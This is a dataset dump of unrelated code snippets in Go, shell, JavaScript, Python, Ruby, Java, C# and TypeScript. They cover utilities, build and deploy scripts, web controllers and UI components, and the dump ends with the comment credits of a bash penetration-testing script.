text
stringlengths 1
1.05M
|
|---|
package main
import (
"fmt"
"strings"
)
func ToTitle(s string) string {
return strings.Title(strings.ToLower(s))
}
func main() {
fmt.Println(ToTitle("this is a title"))
}
|
package file
import (
"os"
"strings"
"github.com/hashicorp/go-multierror"
)
type TempDirGenerator struct {
rootPrefix string
rootLocation string
children []*TempDirGenerator
}
func NewTempDirGenerator(name string) *TempDirGenerator {
return &TempDirGenerator{
rootPrefix: name,
}
}
func (t *TempDirGenerator) getOrCreateRootLocation() (string, error) {
if t.rootLocation == "" {
location, err := os.MkdirTemp("", t.rootPrefix+"-")
if err != nil {
return "", err
}
t.rootLocation = location
}
return t.rootLocation, nil
}
// NewGenerator creates a child generator capable of making sibling temp directories.
func (t *TempDirGenerator) NewGenerator() *TempDirGenerator {
gen := NewTempDirGenerator(t.rootPrefix)
t.children = append(t.children, gen)
return gen
}
// NewDirectory creates a new temp dir within the generators prefix temp dir.
func (t *TempDirGenerator) NewDirectory(name ...string) (string, error) {
location, err := t.getOrCreateRootLocation()
if err != nil {
return "", err
}
return os.MkdirTemp(location, strings.Join(name, "-")+"-")
}
// Cleanup deletes all temp dirs created by this generator and any child generator.
func (t *TempDirGenerator) Cleanup() error {
var allErrs error
for _, gen := range t.children {
if err := gen.Cleanup(); err != nil {
allErrs = multierror.Append(allErrs, err)
}
}
if t.rootLocation != "" {
if err := os.RemoveAll(t.rootLocation); err != nil {
allErrs = multierror.Append(allErrs, err)
}
}
return allErrs
}
|
#!/bin/bash
#SBATCH --job-name=QuEST
#SBATCH --time=1:00:0
#SBATCH --nodes=8
#SBATCH --tasks-per-node=8
#SBATCH --cpus-per-task=16
#SBATCH --account=y18
#SBATCH --partition=standard
#SBATCH --export=none
#SBATCH --qos=standard
module load epcc-job-env
module restore PrgEnv-gnu
#module restore /etc/cray-pe.d/PrgEnv-gnu
export OMP_NUM_THREADS=16
export OMP_PLACES=cores
CMAKE_OPTIONS="-DUSER_SOURCE='compactUnitaryTimer.c' -DQuEST_DIR=QuEST_v2.1.0-gcc10Patch -DDISTRIBUTED=1 -DTESTING=0"
rm -r build
mkdir build; cd build
cmake $CMAKE_OPTIONS ../../..
make
NUM_QUBITS=33
NUM_TRIALS=50
EXE=demo
srun --hint=nomultithread --distribution=block:block ./$EXE $NUM_QUBITS $NUM_TRIALS
cp TIMING* ..
|
var mongoose = require('mongoose');
var Schema = mongoose.Schema;
var uniqueValidator = require('mongoose-unique-validator');
//Create a schema
var Games = new Schema({
gameType: {
type: String,
required: [true, 'Please specify the game you would like to play']
},
name: {
type: String,
required: [true, 'A name is required'],
unique: true
},
shoes: Number,
players: Number,
type: String,
protected: Boolean,
password: String,
pot: Number,
hasStarted: {
type: Boolean,
default: false
},
created: {
type: Date,
default: Date.now
},
modified: {
type: Date
}
});
Games.pre('save', function(next){
this.modified = new Date().toISOString();
next();
});
Games.plugin(uniqueValidator);
module.exports = mongoose.model('Games', Games);
|
import typing as _typing
from .base import BaseModel
MODEL_DICT: _typing.Dict[str, _typing.Type[BaseModel]] = {}
def register_model(name):
def register_model_cls(cls):
if name in MODEL_DICT:
raise ValueError("Cannot register duplicate trainer ({})".format(name))
if not issubclass(cls, BaseModel):
raise ValueError(
"Trainer ({}: {}) must extend BaseModel".format(name, cls.__name__)
)
MODEL_DICT[name] = cls
return cls
return register_model_cls
class ModelUniversalRegistry:
@classmethod
def get_model(cls, name: str) -> _typing.Type[BaseModel]:
if type(name) != str:
raise TypeError
if name not in MODEL_DICT:
raise KeyError
return MODEL_DICT.get(name)
|
<reponame>saucelabs/travis-core
class Build
class Config
class OS
OS_LANGUAGE_MAP = {
"objective-c" => "osx",
}
DEFAULT_OS = "linux"
attr_reader :config, :options
def initialize(config, options)
@config = config
@options = options
end
def run
os_given? ? config : config.merge(os: os_for_language)
end
private
def os_given?
config.key?(:os) || config.key?('os')
end
def includes
config.fetch(:matrix, {}).fetch(:include, [])
end
def os_for_language
OS_LANGUAGE_MAP.fetch(config[:language], DEFAULT_OS)
end
end
end
end
|
#!/bin/sh
set -e
# Test running just latexrun empty.tex, where empty.tex produces no output.
TMP=tmp.$(basename -s .sh "$0")
mkdir -p "$TMP"
cat > "$TMP/empty.tex" <<EOF
\documentclass{article}
\begin{document}
\end{document}
EOF
clean() {
rm -rf "$TMP"
}
trap clean INT TERM
# Intentionally use just the latexrun command to test when -o is not provided.
"$1" "$TMP/empty.tex"
clean
## output:
## No pages of output; output not updated
|
def retire_amendment(amendment_id: int) -> bool:
# Retrieve retirement settings for the product from the system
retirement_settings = get_retirement_settings() # Assume a function to fetch retirement settings
# Check if the specified amendment_id is valid and exists in the system
if is_valid_amendment(amendment_id): # Assume a function to validate the amendment_id
# Determine the conditions for canceling the specified amendment based on retirement settings
if meets_cancellation_conditions(amendment_id, retirement_settings): # Assume a function to check cancellation conditions
# Perform the cancellation of the specified amendment
cancel_amendment(amendment_id) # Assume a function to cancel the specified amendment
return True # Return True to indicate successful retirement
else:
return False # Return False if the cancellation conditions are not met
else:
return False # Return False if the specified amendment_id is invalid or does not exist
|
#!/bin/bash
python3 import_data.py
# keep running after single import
while true; do sleep 30; done
# Still needs work
#python3 app.py
|
#!/bin/bash
SCRIPT_DIR=$(readlink -f "$(dirname "$0")")
AUTOWARE_PROJ_ROOT="$SCRIPT_DIR/../"
DOCKER_BUILDKIT=1 docker build -t autoware:base --ssh default -f "$SCRIPT_DIR/base/Dockerfile" "$AUTOWARE_PROJ_ROOT"
DOCKER_BUILDKIT=1 docker build -t autoware:pre-built --ssh default -f "$SCRIPT_DIR/pre-built/Dockerfile" "$AUTOWARE_PROJ_ROOT"
|
#!/usr/bin/env bash
# shell.sh
# This script starts a shell in an already built container. Sometimes you need to poke around using the shell
# to diagnose problems.
# stop any existing running container
./stop.sh
# fire up the container with shell (/bin/bash)
docker run -it --rm --name chapter02 chapter02 /bin/sh
|
echo Starting...
cd src
bundle exec jekyll serve --future --limit_posts 1
cd ..
|
<reponame>sdsmnc221/visia-panorama-b<gh_stars>0
import { CUModal } from './cumodal';
import { formatBytes, CSVtoJSON, checkCSV, apiCSV } from '../services/helper';
class CUForm {
constructor(el) {
this.form = $(el);
this.init();
}
init() {
this.form.content = this.form.find('.form__content').first();
this.initFormBtns();
this.initFormController();
this.initModal();
}
initFormBtns() {
this.form.btns = {}; //Array.from(this.form.find('.form__btns button'));
this.initAddBtn();
this.initResetBtn();
this.initSubmitBtn();
this.initUploadBtn();
this.initOtherFields();
}
initDropdownFields() {
Array.from(this.form.find('.ui.dropdown').dropdown());
}
initAddBtn() {
const fieldsTemplate = this.form.find('.fields').first().wrap('').parent().html();
this.form.btns.add = this.form.find('.add').first();
this.form.btns.add.on('mouseover', e => {
$(e.target).removeClass('disabled').addClass('primary');
});
this.form.btns.add.on('mouseout', e => {
$(e.target).removeClass('primary');
});
this.form.btns.add.on('click', e => {
e.preventDefault();
this.form.content.append(fieldsTemplate);
this.initFormController();
});
}
initResetBtn() {
const fieldsTemplate = this.form.content.html();
this.form.btns.reset = this.form.find('.reset').first();
this.form.btns.reset.on('mouseover', e => {
$(e.target).removeClass('disabled').addClass('primary');
});
this.form.btns.reset.on('mouseout', e => {
$(e.target).removeClass('primary');
});
this.form.btns.reset.on('click', e => {
e.preventDefault();
this.form.content.html(fieldsTemplate);
this.initFormController();
});
}
initSubmitBtn() {
this.form.btns.submit = this.form.find('.submit').first();
if (!window.location.href.includes('datasets')) {
this.form.btns.submit.popup({
position: 'bottom left',
target: '.form__content',
context: '.form__content',
content: 'N\'oubliez pas de remplir tous les champs !',
});
this.form.btns.submit.on('click', e => {
e.preventDefault();
let btn = $(e.target);
$.when(btn.hasClass('disabled'))
.done(isBtnDisabled => {
if (!isBtnDisabled) this.callAjax(true);
});
// if (!btn.hasClass('disabled')) {
// this.callAjax();
// }
});
} else {
this.form.btns.submit.on('click', e => {
e.preventDefault();
let btn = $(e.target);
$.when(btn.hasClass('disabled'))
.done(isBtnDisabled => {
if (!isBtnDisabled) this.callAjax();
});
});
}
}
initUploadBtn() {
this.form.btns.upload = this.form.find('.upload').first();
this.form.btns.upload.desc = this.form.find('.form__file__desc').first();
this.form.btns.upload.desc.default = this.form.btns.upload.desc.html();
this.form.btns.upload.input = this.form.find('#form__file').first();
this.form.btns.upload.output = this.form.find('.form__file__data').first();
this.form.btns.upload.output.def = this.form.btns.upload.output.html();
this.form.btns.upload.toolbar = this.form.find('.form__file__toolbar').first();
this.form.btns.upload.toolbar.def = this.form.btns.upload.toolbar.html();
this.form.btns.upload.on('mouseover', e => {
$(e.target).addClass('primary');
});
this.form.btns.upload.on('mouseout', e => {
$(e.target).removeClass('primary');
});
this.form.btns.upload.input.on('click', e => {
this.form.btns.upload.toolbar.removeClass('loading hide').html(this.form.btns.upload.toolbar.def);
this.form.btns.upload.output.removeClass('loading').html(this.form.btns.upload.output.def);
})
this.form.btns.upload.input.on('change', e => {
let file = e.target.files[0],
fileReader = new FileReader();
file.desc = `<p>${file.name}</p>
<p>${formatBytes(file.size, 3)}</p>`;
fileReader.onload = () => {
let data = fileReader.result;
if (checkCSV(data)) {
this.form.btns.upload.output.find('.segment').addClass('loading');
this.form.btns.upload.toolbar.find('.segment').addClass('loading');
console.log(data);
apiCSV(data, this.form.btns.upload.output, this.form.btns.upload.toolbar);
}
};
fileReader.readAsText(file);
this.form.btns.upload.desc.html(file.desc);
});
}
initOtherFields() {
//
}
initFormController() {
//Quick workaround for create dataset form, will return to this later
if (!window.location.href.includes('datasets')) {
if (form.type === 'create') $(this.form.btns.submit).addClass('disabled');
this.form.content.fields = Array.from(this.form.find('.fields'));
this.form.content.inputs = Array.from(this.form.content.find('input'));
this.form.content.inputs.forEach(input=> {
$(input).on('keyup', e => {
let input = $(e.target),
hasBlankField = this.form.content.inputs.some(i => $(i).val().trim() === '');
if (hasBlankField) {
$(this.form.btns.submit).addClass('disabled');
} else {
$(this.form.btns.submit).removeClass('disabled');
}
});
});
}
this.initDropdownFields();
}
initModal() {
this.form.modal = new CUModal(this.form.next('.modal.onSuccess'));
}
callAjax(isDataset = false) {
if (!isDataset) {
console.log('l');
let url = `/${form.what}`;
form.data = this.collectData();
$.ajaxSetup({
headers: {
'X-CSRF-TOKEN': $('meta[name="_token"]').attr('content')
}
});
$.ajax({
url: url,
type: 'POST',
dataType: 'json',
data: form,
success: data => {
console.log(data);
this.form.modal.launchModal(data);
},
error: error => {
console.log(error);
}
});
} else {
let url = `/${form.what}`;
form.data = this.collectData(true);
console.log(url);
console.log(form.data);
}
}
collectData(isDataset = false) {
if (!isDataset) {
return _.flattenDeep(this.form.content.fields.map(field => {
return _.zipObject(form.fields_data, Array.from($(field).find('input'))
.map(input => $(input).val().trim()));
}))
} else {
return 'toto';
}
}
}
export { CUForm };
|
#!/usr/bin/env bash
npm version patch && \
git push
|
# File to be sourced to setup the ALEPH env
# Main ALEPH software directory
export ALEPH=/cvmfs/aleph.cern.ch/i386_redhat42
# ALEPH Banks and database
export BANKALFMT=$ALEPH/dbase/bankal.fmt
export DBASBANK=$ALEPH/dbase/dbas.bank
export ADBSCONS=$ALEPH/dbase/adbscons.daf
# Job cards
export ALPHACARDS=MIT.cards
# Not needed: required perhaps by ALPHARUN
# export STAGE_HOST=local
|
#!/bin/bash
set -euo pipefail
if oc -n "openshift-operators-redhat" get deployment elasticsearch-operator -o name > /dev/null 2>&1 ; then
exit 0
fi
pushd ../elasticsearch-operator
LOCAL_IMAGE_ELASTICSEARCH_OPERATOR_REGISTRY=127.0.0.1:5000/openshift/elasticsearch-operator-registry \
make elasticsearch-catalog-deploy
IMAGE_ELASTICSEARCH_OPERATOR_REGISTRY=image-registry.openshift-image-registry.svc:5000/openshift/elasticsearch-operator-registry \
make -C ../elasticsearch-operator elasticsearch-operator-install
popd
|
#!/usr/bin/env sh
set -e
set -u
make --version
zip --version
git --version
curl --version
which openssl
docker --version
docker-compose --version
bash --version
envsubst --version
|
package cntr
func DistinctStrings(elems ...string) []string {
m := map[string]bool{}
for _, e := range elems {
m[e] = true
}
var retElems []string
for e, _ := range m {
retElems = append(retElems, e)
}
return retElems
}
|
<filename>src/shared/models/response.model.ts
export default class ResponseModel {
error: boolean;
message: string;
results: any;
constructor(error: boolean, message: string, results: any) {
this.error = error;
this.message = message;
this.results = results || {};
}
static success(results: any) {
return new ResponseModel(false, '', results);
}
static error(message: string) {
return new ResponseModel(true, message, null);
}
}
|
#!/bin/bash
LLVM_VERSION=$1
LLVM_SYS_VERSION=$2
PYTHON_VERSION=$3
VENV_HOME=`pwd`/.virtualenv
# create llvm-config symlink
sudo rm -f /usr/bin/llvm-config
sudo ln -s /usr/bin/llvm-config-$LLVM_VERSION /usr/bin/llvm-config
export WELD_HOME=`pwd`
source $VENV_HOME/python$PYTHON_VERSION/bin/activate
cd python/pyweld
python setup.py install
cd ../..
cd python/grizzly
python setup.py install
cd ../..
# set llvm-sys crate version
sed -i "s/llvm-sys = \".*\"/llvm-sys = \"$LLVM_SYS_VERSION\"/g" Cargo.toml
# build and test
# Note that cargo build must, counterintuitively, come after setup.py install,
# because numpy_weld_convertor.cpp is built by cargo.
make -C weld_rt/cpp/
cargo build --release
cargo test
export LD_LIBRARY_PATH=`pwd`/target/release
python python/grizzly/tests/grizzly_test.py
python python/grizzly/tests/numpy_weld_test.py
# run tests for nditer - first need to install weldnumpy
cd python/numpy
python setup.py install
python ../../examples/python/nditer/nditer_test.py
cd ../..
cd $WELD_HOME/weld-benchmarks; python run_benchmarks.py -b tpch_q1 tpch_q6 vector_sum map_reduce data_cleaning crime_index crime_index_simplified -n 5 -f results.tsv -v -d -p performance.png
mkdir -p $WELD_HOME/results
mv performance.png $WELD_HOME/results
mv results.tsv $WELD_HOME/results
cd $WELD_HOME
deactivate
|
const express = require('express');
const router = express.Router();
let sqlite3 = require('sqlite3').verbose();
let db = new sqlite3.Database('./db/movies.db', sqlite3.OPEN_READONLY, (err) => {
if (err) {
return console.error(err.message);
}
console.log('Connected to the movies database.');
});
router.get('/', (req, res) => {
const sql = `SELECT title,
imdbId, genres,
releaseDate, budget
FROM movies LIMIT 50`;
db.all(sql, (err, movies) => {
if (err) {
return console.error(err.message);
}
if (movies) {
res.send(movies);
} else if (!movies) {
res.send('No movie titles have been found.');
}
});
});
router.get('/:movieId', (req, res) => {
const sql = `SELECT movieId id,
title title,
overview overview
FROM movies
WHERE movieId = ?`;
const movieId = req.params.movieId;
db.get(sql, [movieId], (err, row) => {
if (err) {
return console.error(err.message);
}
if (row) {
console.log(row.id, row.title)
res.status(200).json({'id': row.id, 'title': row.title, 'overview': row.overview});
} else if (!row) {
console.log(`No movie found with the id ${movieId}`);
res.send(`No movie found with the id ${movieId}`);
}
});
});
module.exports = router;
|
public class SumOddNumbers
{
public static void Main()
{
int n;
n = int.Parse(Console.ReadLine());
int sum = 0;
for(int i = 1; i <= n; i+=2)
{
sum += i;
}
Console.WriteLine(sum);
}
}
|
/* GENERATED FILE */
import { html, svg, define } from "hybrids";
const PhClub = {
color: "currentColor",
size: "1em",
weight: "regular",
mirrored: false,
render: ({ color, size, weight, mirrored }) => html`
<svg
xmlns="http://www.w3.org/2000/svg"
width="${size}"
height="${size}"
fill="${color}"
viewBox="0 0 256 256"
transform=${mirrored ? "scale(-1, 1)" : null}
>
${weight === "bold" &&
svg`<path d="M104.512,186.61814a47.9857,47.9857,0,1,1-17.29771-85.30105l-.00069.00287a48,48,0,1,1,81.57046.00366l-.00718-.00443a48.00516,48.00516,0,1,1-17.28893,85.299L160,232H96Z" fill="none" stroke="${color}" stroke-linecap="round" stroke-linejoin="round" stroke-width="24"/>`}
${weight === "duotone" &&
svg`<g opacity="0.2">
<path d="M112.51708,179.15431a47.97767,47.97767,0,1,1-25.30276-77.83722l-.00069.00287a48,48,0,1,1,81.57046.00366l-.00718-.00443a48.00575,48.00575,0,1,1-25.29289,77.8364L160,232H96Z"/>
</g>
<path d="M112.51708,179.15431a47.97767,47.97767,0,1,1-25.30276-77.83722l-.00069.00287a48,48,0,1,1,81.57046.00366l-.00718-.00443a48.00575,48.00575,0,1,1-25.29289,77.8364L160,232H96Z" fill="none" stroke="${color}" stroke-linecap="round" stroke-linejoin="round" stroke-width="16"/>`}
${weight === "fill" &&
svg`<path d="M232,148a52.00505,52.00505,0,0,1-80.459,43.52539l10.6538,34.08789A7.99984,7.99984,0,0,1,154.55908,236H101.44092a7.99954,7.99954,0,0,1-7.63526-10.38672L104.45459,191.542a51.7046,51.7046,0,0,1-29.9624,8.43653c-27.72657-.78516-50.377-24.00489-50.4917-51.75977A51.99976,51.99976,0,0,1,76,96q2.02881,0,4.04883.15625a52.00294,52.00294,0,1,1,95.89648,0,53.33621,53.33621,0,0,1,5.46387-.1377A51.70261,51.70261,0,0,1,232,148Z"/>`}
${weight === "light" &&
svg`<path d="M112.51708,179.15431a47.97767,47.97767,0,1,1-25.30276-77.83722l-.00069.00287a48,48,0,1,1,81.57046.00366l-.00718-.00443a48.00575,48.00575,0,1,1-25.29289,77.8364L160,232H96Z" fill="none" stroke="${color}" stroke-linecap="round" stroke-linejoin="round" stroke-width="12"/>`}
${weight === "thin" &&
svg`<path d="M112.51708,179.15431a47.97767,47.97767,0,1,1-25.30276-77.83722l-.00069.00287a48,48,0,1,1,81.57046.00366l-.00718-.00443a48.00575,48.00575,0,1,1-25.29289,77.8364L160,232H96Z" fill="none" stroke="${color}" stroke-linecap="round" stroke-linejoin="round" stroke-width="8"/>`}
${weight === "regular" &&
svg`<path d="M112.51708,179.15431a47.97767,47.97767,0,1,1-25.30276-77.83722l-.00069.00287a48,48,0,1,1,81.57046.00366l-.00718-.00443a48.00575,48.00575,0,1,1-25.29289,77.8364L160,232H96Z" fill="none" stroke="${color}" stroke-linecap="round" stroke-linejoin="round" stroke-width="16"/>`}
</svg>
`,
};
define("ph-club", PhClub);
export default PhClub;
|
import java.util.Arrays;
public class ArrayInfo {
public static void main(String[] args) {
int[] array = {3, 1, 5, 9, 4};
int min = Arrays.stream(array).min().getAsInt();
int max = Arrays.stream(array).max().getAsInt();
double mean = Arrays.stream(array).average().getAsDouble();
System.out.println("Min: " + min);
System.out.println("Max: " + max);
System.out.println("Mean: " + mean);
}
}
|
package com.banana.volunteer.VO.reportVO;
import com.fasterxml.jackson.annotation.JsonInclude;
import com.fasterxml.jackson.annotation.JsonProperty;
import lombok.Data;
import java.util.List;
@Data
@JsonInclude(JsonInclude.Include.NON_NULL)
public class ReportDataVO {
@JsonProperty("total")
private Integer reportTotal;
@JsonProperty("report_list")
private List<ReportViewListVO> reportViewListVO;
}
|
package fr.unice.polytech.si3.qgl.soyouz.tooling.awt;
import fr.unice.polytech.si3.qgl.soyouz.Cockpit;
import fr.unice.polytech.si3.qgl.soyouz.classes.geometry.Position;
import fr.unice.polytech.si3.qgl.soyouz.classes.marineland.entities.ShapedEntity;
import fr.unice.polytech.si3.qgl.soyouz.tooling.model.SimulatorModel;
import java.util.Collection;
import java.util.LinkedList;
import java.util.List;
public interface SimulatorView
{
static void updateHistory(SimulatorModel model, LinkedList<Position>[] shipHistory)
{
var ships = model.getShips();
for (int i = 0; i < ships.length; i++)
{
var history = shipHistory[i];
var shipPos = ships[i].getPosition();
if (history.isEmpty() || !shipPos.equals(history.getLast()))
{
history.add(shipPos);
}
}
}
void clearHistory();
void setDrawPath(boolean selected);
void setDrawNodes(boolean selected);
void setDebugCollisions(boolean selected);
void centerView(boolean b);
void reset();
void update();
SimulatorModel getModel();
default Collection<ShapedEntity> getVisibleShapes()
{
var cp = getModel().cockpits[0];
if (cp instanceof Cockpit)
return ((Cockpit)cp).entityMemory.values();
return List.of(getModel().nps[0].getVisibleEntities());
}
}
|
require File.expand_path('../../../../spec_helper', __FILE__)
require 'complex'
require File.expand_path('../shared/asinh', __FILE__)
describe "Math#asinh" do
it_behaves_like :complex_math_asinh, :_, IncludesMath.new
it "is a private instance method" do
IncludesMath.should have_private_instance_method(:asinh)
end
end
describe "Math.asinh" do
it_behaves_like :complex_math_asinh, :_, CMath
end
|
import React from 'react';
import clsx from 'clsx';
import { makeStyles } from '@material-ui/styles';
import CssBaseline from '@material-ui/core/CssBaseline';
import Drawer from '@material-ui/core/Drawer';
import Box from '@material-ui/core/Box';
import AppBar from '@material-ui/core/AppBar';
import Toolbar from '@material-ui/core/Toolbar';
import List from '@material-ui/core/List';
import Typography from '@material-ui/core/Typography';
import Divider from '@material-ui/core/Divider';
import IconButton from '@material-ui/core/IconButton';
import Badge from '@material-ui/core/Badge';
import Container from '@material-ui/core/Container';
import Grid from '@material-ui/core/Grid';
import Paper from '@material-ui/core/Paper';
import Link from '@material-ui/core/Link';
import MenuIcon from '@material-ui/icons/Menu';
import ChevronLeftIcon from '@material-ui/icons/ChevronLeft';
import NotificationsIcon from '@material-ui/icons/Notifications';
import Avatar from '@material-ui/icons/Notifications';
import { IconBell, IconChevronUp, IconSearch } from '@tabler/icons';
import seelogo from '../../assets/images/seelogo.png';
// import Chart from './Chart';
// import Deposits from './Deposits';
// import Orders from './Orders';
import Header from '../../components/Header';
import Sidebar from '../../components/Sidebar';
import Home from '../Home';
import { Outlet } from 'react-router-dom';
import { styled } from '@material-ui/core/styles';
function Copyright() {
return (
<Typography variant="body2" color="textSecondary" align="center">
{'Copyright © '}
<Link color="inherit" href="https://material-ui.com/">
Your Website
</Link>
{' '}
{new Date().getFullYear()}
.
</Typography>
);
}
const drawerWidth = 240;
const useStyles = makeStyles((theme) => ({
root: {
display: 'flex',
},
toolbar: {
paddingRight: 24, // keep right padding when drawer closed
},
toolbarIcon: {
display: 'flex',
alignItems: 'center',
justifyContent: 'center',
border: 'none',
padding: '0 8px',
...theme.mixins.toolbar,
},
appBar: {
zIndex: theme.zIndex.drawer + 1,
transition: theme.transitions.create(['width', 'margin'], {
easing: theme.transitions.easing.sharp,
duration: theme.transitions.duration.leavingScreen,
}),
},
appBarShift: {
marginLeft: drawerWidth,
width: `calc(100% - ${drawerWidth}px)`,
transition: theme.transitions.create(['width', 'margin'], {
easing: theme.transitions.easing.sharp,
duration: theme.transitions.duration.enteringScreen,
}),
},
menuButton: {
marginRight: 36,
},
menuButtonHidden: {
display: 'none',
},
title: {
flexGrow: 1,
},
drawerPaper: {
position: 'relative',
whiteSpace: 'nowrap',
width: drawerWidth,
transition: theme.transitions.create('width', {
easing: theme.transitions.easing.sharp,
duration: theme.transitions.duration.enteringScreen,
}),
},
drawerPaperClose: {
overflowX: 'hidden',
transition: theme.transitions.create('width', {
easing: theme.transitions.easing.sharp,
duration: theme.transitions.duration.leavingScreen,
}),
width: theme.spacing(7),
[theme.breakpoints.up('sm')]: {
width: theme.spacing(9),
},
},
appBarSpacer: theme.mixins.toolbar,
content: {
flexGrow: 1,
height: '100vh',
overflow: 'auto',
backgroundColor: '#EFF1F5',
paddingTop:"15px"
},
container: {
paddingTop: theme.spacing(4),
paddingBottom: theme.spacing(4),
},
paper: {
padding: theme.spacing(2),
display: 'flex',
overflow: 'auto',
flexDirection: 'column',
},
fixedHeight: {
height: 240,
},
headerAvatar: {
height: '10vh'
},
}));
const DashboardLayoutRoot = styled('div')(
({ theme }) => ({
backgroundColor: theme.palette.background.default,
display: 'flex',
height: '100%',
overflow: 'hidden',
width: '100%'
})
);
const DashboardLayoutWrapper = styled('div')(
({ theme }) => ({
display: 'flex',
flex: '1 1 auto',
overflow: 'hidden',
paddingTop: 64,
[theme.breakpoints.up('lg')]: {
paddingLeft: 256
}
})
);
const DashboardLayoutContainer = styled('div')({
display: 'flex',
width:"100%",
flex: '1 1 auto',
overflow: 'hidden'
});
const DashboardLayoutContent = styled('div')({
flex: '1 1 auto',
height: '100%',
overflow: 'auto'
});
export default function Dashboard(props) {
const classes = useStyles();
const [open, setOpen] = React.useState(false);
const handleDrawerOpen = () => {
setOpen(true);
};
const handleDrawerClose = () => {
//console.log('hyy');
setOpen(false);
};
const handleToggleDrawer = () => {
setOpen(open?false:true);
};
const fixedHeightPaper = clsx(classes.paper, classes.fixedHeight);
return (
// <div className={classes.root}>
// <Header
// handleToggleDrawer={handleToggleDrawer}
// open={open}
// />
// <Sidebar open={open} drawerWidth={drawerWidth} />
// <main className={classes.content}>
// <div className={classes.appBarSpacer} />
// {/* {props.children} */}
// <Outlet />
// </main>
// {/* <DashboardLayoutContainer>
// <DashboardLayoutContent>
// <Outlet />
// </DashboardLayoutContent>
// </DashboardLayoutContainer> */}
// </div>
<div className={classes.root}>
<Header
handleToggleDrawer={handleToggleDrawer}
open={open}
/>
{/* <Sidebar open={open} drawerWidth={drawerWidth} handleToggleDrawer={handleToggleDrawer} /> */}
<main className={classes.content}>
<div className={classes.appBarSpacer} />
<Outlet />
</main>
</div>
);
}
|
#!/bin/bash
set -euo pipefail
source "$( dirname "${BASH_SOURCE[0]}" )/../helper/getid.sh"
url=$1
path=$2
policy_path="$path/policies/*.json"
echo "Deleting policies in $policy_path..."
for filename in $policy_path; do
id=$(getid $filename)
(set -x; keto policies --endpoint $url delete $id || true)
done
echo "Deleted all policies in $policy_path!"
echo "Importing policies in $policy_path..."
for filename in $policy_path; do
(set -x; keto policies --endpoint $url import $filename)
done
echo "Imported all policies in $policy_path!"
|
function swap(&$a,&$b){
$a = $a + $b;
$b = $a - $b;
$a = $a - $b;
}
|
document.write("<script type='text/javascript' src='print.js'></script>");
document.write("<script type='text/javascript' src='print1.js'></script>");
document.write("<script type='text/javascript' src='print2.js'></script>");
document.write("<script type='text/javascript' src='printall.js'></script>");
document.write("<script type='text/javascript' src='printhtml.js'></script>");
document.write("<script type='text/javascript' src='addpagecomment.js'></script>");
document.write("<script type='text/javascript' src='batchprintdialog.js'></script>");
|
<reponame>nitinchauhan1986/AsianetRepo<filename>src/components/desktop/Header/Socials/WithSocials.js
import React from 'react';
import Loadable from 'react-loadable';
const LoadableComponent = Loadable({
loader: () => import(/* webpackChunkName: 'Socials' */ './Socials'),
loading: () => null,
});
export default class WithSocials extends React.Component {
constructor() {
super();
this.state = {};
}
componentDidMount() {
setTimeout(() => {
this.setState({ load: true });
}, 1000);
}
render() {
if (!this.state.load) {
return null;
}
return <LoadableComponent {...this.props} />;
}
}
|
<reponame>johannespfann/deepspace
package de.pfann.deepspace.fightsystem.chain
import de.pfann.deepspace.api.{AttackAction, Fightable}
class AttackerEndState extends AttackerState{
override def startFight(): Unit = {
throw new NotImplementedError()
}
override def getFleets(): List[Fightable] = {
List[Fightable]()
}
override def attack(attackAction: AttackAction): Unit = {
println(this.getClass.getSimpleName + " attack - 0 -> should not happen")
// do nothing
}
override def isAlive(): Boolean = {
println(this.getClass.getSimpleName + " isAlive - false")
false
}
}
|
<filename>src/interfaces/validation/ivalidator.ts
export interface IValidator<T> {
readonly validateSync: (data: T) => void;
}
|
package cn.dmdream.cas.controller;
import cn.dmdream.cas.utils.CapchaUtil;
import com.fasterxml.jackson.core.JsonProcessingException;
import com.fasterxml.jackson.databind.ObjectMapper;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.jms.core.JmsTemplate;
import org.springframework.web.bind.annotation.PathVariable;
import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.bind.annotation.RestController;
import javax.imageio.ImageIO;
import javax.servlet.ServletException;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import javax.servlet.http.HttpSession;
import java.awt.image.BufferedImage;
import java.io.IOException;
import java.util.HashMap;
import java.util.Map;
@RestController
public class SmsController {
//消息队列服务器
@Autowired
private JmsTemplate jmsTemplate;
@RequestMapping("sendSms/{phone}")
public String sendSms(@PathVariable("phone") String phone) {
if (phone == null || "".equals(phone)) {
return "请输入正确的手机号!";
}
String phoneReg = "^((13[0-9])|(14[5,7,9])|(15([0-3]|[5-9]))|(166)|(17[0,1,3,5,6,7,8])|(18[0-9])|(19[8|9]))\\d{8}$";
if (!phone.matches(phoneReg)) {
return "请输入正确的手机号!";
}
// 创建map对象
Map<String, String> mapMessage = new HashMap<String, String>();
// 放入消息
// 手机号
mapMessage.put("mobile", phone);
//code
int code = (int)((Math.random()*9+1)*100000);
mapMessage.put("code", code+"");
String jsonMap = null;
try {
jsonMap = new ObjectMapper().writeValueAsString(mapMessage);
} catch (JsonProcessingException e) {
e.printStackTrace();
return "消息处理异常";
}
// 给短信发送网关服务发送消息 pyg-sms
jmsTemplate.convertAndSend("fg-sms-login-Queue",jsonMap);
return "success";
}
public static final String KEY_CAPTCHA = "capcha";
@RequestMapping("/capcha.jpg")
public void getCaptcha(HttpServletRequest request, HttpServletResponse response)throws ServletException, IOException {
// 设置相应类型,告诉浏览器输出的内容为图片
response.setContentType("image/jpeg");
// 不缓存此内容
response.setHeader("Pragma", "No-cache");
response.setHeader("Cache-Control", "no-cache");
response.setDateHeader("Expire", 0);
try {
HttpSession session = request.getSession();
CapchaUtil tool = new CapchaUtil();
StringBuffer code = new StringBuffer();
BufferedImage image = tool.genRandomCodeImage(code);
session.removeAttribute(KEY_CAPTCHA);
session.setAttribute(KEY_CAPTCHA, code.toString());
// 将内存中的图片通过流动形式输出到客户端
ImageIO.write(image, "JPEG", response.getOutputStream());
} catch (Exception e) {
e.printStackTrace();
}
}
}
|
#!/bin/bash
#
# by Lee Baird
# Contact me via chat or email with any feedback or suggestions that you may have:
# leebaird@gmail.com
#
# Special thanks to the following people:
#
# Jay Townsend - conversion from Backtrack to Kali, manages pull requests & issues
# Jason Ashton (@ninewires)- Penetration Testers Framework (PTF) compatibility, Registered Domains, bug crusher, and bash ninja
#
# Ben Wood (@DilithiumCore) - regex master
# Dave Klug - planning, testing and bug reports
# Jason Arnold (@jasonarnold) - planning original concept, author of ssl-check and co-author of crack-wifi
# John Kim - python guru, bug smasher, and parsers
# Eric Milam (@Brav0Hax) - total re-write using functions
